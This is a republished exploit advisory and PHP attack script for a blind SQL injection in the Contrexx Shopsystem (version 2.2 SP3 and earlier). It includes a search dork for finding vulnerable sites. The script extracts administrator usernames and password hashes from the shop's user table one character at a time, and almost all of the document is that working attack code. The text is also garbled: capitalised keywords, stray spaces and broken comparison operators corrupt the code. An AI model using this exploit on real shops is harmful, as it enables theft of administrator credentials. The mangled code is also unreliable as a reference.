Contrexx Shopsystem & lt; = 2.2 SP3 blind injection defect and repair

Exploit title: Contrexx Shopsystem Blind SQL Injection Exploit
Exploit PoC: index. php? Section = shop & productId = [VALID productid] and [your blind SQL CODE]
Exploit tested on: Debian 6, Ubuntu Linux 11.04
Exploit found and written by: Penguin
Version: = <2.2 SP 3
Date found: 12.8.11
Dork: inurl: index. php? Section = shop & productId =
Vendor: www.contrexx.com
Visit: www.null-sector.info
Contact: Jabber-> penguin@null-sector.info
 
#! /Usr/bin/php
<? Php
/*
Exploit title: Contrexx Shopsystem Blind SQL Injection Exploit
Exploit PoC: index. php? Section = shop & productId = [VALID productid] and [your blind SQL CODE]
Exploit tested on: Debian 6, Ubuntu Linux 11.04
Exploit found and written by: Penguin
Version: = <2.2 SP 3
Date found: 12.8.11
Dork: inurl: index. php? Section = shop & productId =
Web: www.2cto.com
Visit: www.null-sector.info
Contact: Jabber-> penguin@null-sector.info

Greets to: Blacktiger/Luxy, Leto, hAgBaRd2ooo, KrimiX, zYiix, reutz/head

Important info to this Exploit:
If you want to use it on a non-german site you have to edit the string in testIt "In den Warenkorb "!
Known Bugs:
-> Some servers response 500-Internal Server Error. Dunno why :(
-> On non-german shops you must edit the function testIt. It does not fetch a keyword automatic :/
*/
 
Echo "###################################### # \ r \ n ";
Echo "# Contrexx Shopsystem Exploit # \ r \ n ";
Echo "# Exploit Type: Blind SQL Injection # \ r \ n ";
Echo "# Exploit State: Non-Public # \ r \ n ";
Echo "# Programmed by: Penguin # \ r \ n ";
Echo "###################################### # \ r \ n ";
If ($ argc <4)
{
Echo "USAGE:./exploit. php [TARGET] [PRODUCTID] [admin row] \ r \ n ";
Echo "Target = ex. http://www.bkjia.com/index. php \ r \ n ";
Echo "PRODUCTID = a VALID ProductId! \ R \ n ";
Echo "Admin Row = The Exploit selects all admins and use limit [admin row], 1. Standard: 0 \ r \ n ";
} Else {
// There are some Config variables :)
// If you know what you're doing, feel free to change them:>
$ Target_url = $ argv [1]. "? Section = shop & cmd = details & productId = ". $ argv [2];
$ Charset_start_usr = 96;
$ Charset_end_usr = 126;
$ Charset_hash = Array (99,100,101,102 );
$ ToLength = 100;
$ MyLimit = $ argv [3];

// Now the Action start :)
 
Echo "Starting exploit... \ r \ nChecking if Vulnerable ...";
$ Check = file_get_contents ($ target_url ."'");
If (testIt ($ check) = true)
{
Die ("Target is not Vulnerable :( \ r \ n ");
}
Echo "Target is Vulnerable :) \ r \ n ";
Echo "Starting the SQL Injection... \ r \ n ";
Echo "Fetching Username... \ r \ n ";
$ Username = getUsername ($ toLength, $ charset_start_usr, $ charset_end_usr, $ target_url, $ myLimit );
$ Hash = getHash ($ toLength, $ charset_hash, $ target_url, $ myLimit );
Echo "Exploited Successfully! \ R \ n ";
Echo "Full Logindata: $ username: $ hash \ r \ n ";
Echo "Have fun;) \ r \ n ";
}
 
/////////////////////////////////////////
 
// Functions-Sorry, code is a bit "uugly ":)
Function getUsername ($ toLength, $ charset_start, $ charset_end, $ target_url, $ limit)
{
$ Username = "";
// Get Length
$ Length =-1;
For ($ I = 0; $ I <$ toLength; $ I ++)
{
$ Url = $ target_url. "/**/and/**/(select/**/length (username) /**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/$ limit, 1) = ". $ I;
$ Src = file_get_contents ($ url );
If (testIt ($ src) = true)
{
$ Length = $ I;
Break;
}
}
If ($ length =-1)
{
Die ("There was a problem @ fetching username length :( \ r \ n ");
}
Echo "Username length: $ length! \ R \ n ";
$ Username = "";
Echo "Username :";
For ($ k = 0; $ k <$ length; $ k ++)
{
$ CharToAdd = "";
For ($ c = $ charset_start; $ c <$ charset_end; $ c ++)
{
$ P = $ k + 1;
$ Src = file_get_contents ($ target_url. "/**/and/**/substring (select/**/username/**/from/**/contrexx_access_users/**/where/**/is_admin/ **/=/**/1/**/limit/**/$ limit, 1), $ p, 1) = char ($ c )");
If (testIt ($ src) = true)
{
$ CharToAdd = $ c;
Break;
}
}
Echo chr ($ c );
$ Username. = chr ($ c );
}
Echo "\ r \ n ";
Return $ username;
}
 
Function getHash ($ toLength, $ charset, $ target_url, $ limit)
{
// Get Hash
 
$ Hash = "";
Echo "Hash :";
For ($ k = 0; $ k <32; $ k ++)
{
$ CharToAdd = "";
For ($ c = 0; $ c <count ($ charset); $ c ++)
{
$ P = $ k + 1;
$ Z = $ charset [$ c];
$ Src = file_get_contents ($ target_url. "/**/and/**/substring (select/**/password/**/from/**/contrexx_access_users/**/where/**/is_admin/ **/=/**/1/**/limit/**/$ limit, 1), $ p, 1) = char ($ z )");
If (testIt ($ src) = true)
{
$ CharToAdd = $ charset [$ c];
Break;
}
}
Echo chr ($ charToAdd );
$ Hash. = chr ($ charToAdd );
}
Echo "\ r \ n ";
Return $ hash;
}
 
Function testIt ($ src)
{
$ Check = explode ("In den Warenkorb", $ src );
If (count ($ check)> = 2)
{
Return true;
}
Return false;
}
 
?>